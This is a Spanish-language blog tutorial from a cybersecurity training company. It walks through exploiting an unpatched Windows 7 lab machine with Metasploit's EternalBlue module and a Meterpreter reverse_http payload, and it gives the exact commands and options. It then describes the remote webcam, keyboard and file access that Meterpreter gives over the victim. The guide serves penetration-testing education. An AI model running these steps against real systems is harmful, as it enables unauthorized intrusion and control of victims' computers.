¿Cómo ejecutar un payload?

Autor: | Última modificación: 18 de abril de 2024 | Tiempo de Lectura: 3 minutos
Temas en este post: ,

Algunos de nuestros reconocimientos:

Premios KeepCoding

¿Cómo ejecutar un payload en un laboratorio de hacking ético?

El siguiente tutorial sobre cómo ejecutar un payload está hecho con fines educativos. Las técnicas que mostraremos a continuación sirven para entender cómo se comporta un atacante al hackear un sistema y, además, para poner a prueba el riesgo de una vulnerabilidad informática. El uso de las herramientas que veremos, suele ser ilegal si no se tiene propiedad o autorización para ejecutarlas en un sistema. Por eso, deben aplicarse de forma responsable y en entornos virtuales seguros.

Un payload es un código malicioso que se ejecuta después de explotar una vulnerabilidad informática en un sistema o aplicación web. Existen muchas maneras de ejecutar un payload y diferentes tipos de códigos maliciosos que se pueden utilizar. Sin embargo, en este post explicaremos un método básico, por medio del uso de un laboratorio de pentesting.

A continuación, veremos cómo ejecutar un payload en un sistema con Metasploit Framework.

¿Cómo ejecutar un payload?

Preparación

Lo primero que haremos para este ejercicio será crear dos máquinas virtuales: una desde la que haremos el ataque y otra a la que atacaremos. Para ello, en tu software de virtualización preferido, crea dos máquinas con las siguientes características:

  1. Una con sistema operativo Kali Linux.
  2. Otra con sistema operativo Windows 7 del año 2012 (para que no tenga actualizaciones).

Explotación

Antes de comenzar la fase de explotación, abre la máquina virtual de Windows 7 y averigua su dirección IP con el comando «ipconfig» desde la consola. Para este ejemplo, supondremos que dicha dirección es 192.168.172.128.

Después de esto, dirígete a la máquina de Kali Linux y abre la consola de Metasploit Framework con el siguiente comando:

msfconsole

🔴 ¿Quieres entrar de lleno a la Ciberseguridad? 🔴

Descubre el Ciberseguridad Full Stack Bootcamp de KeepCoding. La formación más completa del mercado y con empleabilidad garantizada

👉 Prueba gratis el Bootcamp en Ciberseguridad por una semana

Ahora, buscaremos el exploit (EternalBlue) que vamos a utilizar en el ataque con el comando:

search eternalblue

Veremos diferentes opciones de exploits y, para elegir una de ellas, usaremos el comando:

use exploit/windows/smb/ms17_010_eternalblue

En este punto, ya habremos elegido el exploit que utilizaremos para entrar a la máquina con Windows 7. Sin embargo, nos falta configurar el payload y también el exploit. Comencemos por el payload.

Configuración del payload

En este ejercicio sobre cómo ejecutar un payload con Metasploit Framework, este código se ejecutará justo después del exploit. Para configurarlo, usaremos el comando:

set payload windows/x64/meterpreter/reverse_http

Ahora, debemos asignarle valores a las variables RHOSTS y LPORT, para que el exploit sepa en qué máquina ejecutarse y con qué puerto local conectarse para hacer la postexplotación. Esto lo haremos con los siguientes comandos consecutivos:

set RHOSTS 192.168.172.128
set LPORT 7777

El puerto puede ser el que desees. Para ejecutar el exploit y el payload usa el comando:

exploit

Postexplotación

La última fase de cómo ejecutar un payload con Metasploit es la postexplotación. Para este ejercicio, hemos elegido un payload de tipo Meterpreter. Meterpreter es un código que opera a muy bajo nivel en la máquina comprometida, por lo que es muy difícil de detectar. Sin embargo, permite ejecutar cualquier acción en el ordenador de la víctima. Es decir, sirve para hacer ejecución remota de comandos, subir y descargar archivos del ordenador, acceder a su cámara web, teclado, ratón y pantalla, entre más acciones.

Meterpreter emula los payloads que pueden ser usados por atacantes en hackeos reales y, por lo tanto, ayuda a medir el riesgo de una vulnerabilidad informática en un sistema. Existen diferentes versiones de Meterpreter, que también se pueden adaptar a sistemas Unix e, incluso, sistemas operativos para dispositivos móviles. Sin embargo, todas las versiones funcionan de distintas formas y la más estable es la de Windows.

Para aprender más sobre cómo ejecutar un proceso de postexplotación con Meterpreter, visita nuestro post sobre comandos de Meterpreter. Allí, aprenderás cómo manejar este programa de ejecución remota de código, que puede aplicarse en tests de intrusión.

Ya hemos visto cómo ejecutar un payload de tipo Meterpreter con Metasploit Framework. Si quieres aprender más métodos para hacerlo, en KeepCoding tenemos un curso intensivo justo para ti. Visita nuestro Ciberseguridad Full Stack Bootcamp y descubre cómo puedes convertirte en un especialista del sector en tan solo 7 meses. ¡No sigas esperando, aprovecha esta oportunidad e inscríbete ahora!

Posts Relacionados

¡CONVOCATORIA ABIERTA!

Ciberseguridad

Full Stack Bootcamp

Clases en Directo | Profesores en Activo | Temario 100% actualizado